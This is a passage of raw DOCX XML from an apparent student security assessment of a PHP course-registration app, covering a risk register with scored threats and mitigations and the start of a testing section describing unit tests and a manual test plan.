            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>R9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6FF67472" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Verbose errors leak internals</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5CDE2DC7" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2×2=4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="528F0894" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Fail-closed error display</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5448F513" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1×2=2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0DEEB58B" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Mitigated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="63E1FA44" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="284EE06E" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>R10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7504B32D" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Fast offline cracking of leaked hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="505AAFAC" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2×3=6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="421229BC" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Argon2id hashing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4DD7D961" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1×3=3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6CBB2E09" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Mitigated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="7EAF4ED4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6F4AEB3A" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>R11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="282EF8D2" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Race condition over-subscribes course</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2D0C67BB" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2×1=2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4FF449CC" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SELECT ... FOR UPDATE in transaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="69C00148" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1×1=1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="05FE0FC3" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Mitigated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="0D90E8C9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2670148D" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>R12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="34D130AD" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>No MFA — leaked password</w:t>
            </w:r>
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> alone suffices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="58453350" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>3×2=6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="71CE756D" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Not implemented in this scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="187BCFFC" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>3×2=6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="60E6B3E9" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Accepted / future work</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="648D3F82" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0B3F1328" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>R13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0DCE987C" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>No WAF / DDoS protection at network edge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="49BC944E" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2×2=4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="62924435" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Out of scope (infrastructure control)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="204F9739" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2×2=4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="286923C0" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Accepted / future work</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="2155D0EA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="19CA585D" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>R14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="02AC9E1D" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>No automated dependency/vulnerability scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="333A6619" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2×2=4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="626BA353" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Manual review only in this assignment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="56659A9E" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2×2=4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="12E975B8" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Accepted / future work</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="743C55E8" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="007B5C98">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49B88843" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Recommendations arising from the accepted risks (R12–R14) are expanded in Section 9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47504A3B" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:r w:rsidRPr="00267CCC">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3C95BE" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:lastRenderedPageBreak/>
        <w:t>7. Testing and Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254991D6" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:t>7.1 Automated Unit Tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126C834E" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A dependency-free PHP test runner (tests/</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">run_tests.php) exercises the pure-logic components without needing a live database: input validation (Validator), password hashing round-trips (Auth::hashPassword / password_verify), CSRF token generation/verification/tamper-rejection (Csrf), and the SSRF </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>allowlist decision logic (UrlGuard). It is invoked with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F60287"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php tests/run_tests.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CBE1E9" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>and prints a pass/fail line per check plus a summary total, suitable for a console screenshot in the evidence folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA6A4ED" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:t>7.2 Manual, Database-Backed Test Plan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5711E68C" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">tests/README.md </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>documents ten manual scenarios to run against a local MySQL instance, each mapped to the corresponding finding and expected outcome. A condensed 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4200"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="34D2838D" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3D6D"/>
          </w:tcPr>
          <w:p w14:paraId="64C66984" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3D6D"/>
          </w:tcPr>
          <w:p w14:paraId="2ACAD2EF" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3D6D"/>
          </w:tcPr>
          <w:p w14:paraId="420AD678" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Expected Result</w:t>
            </w:r>
          </w:p>
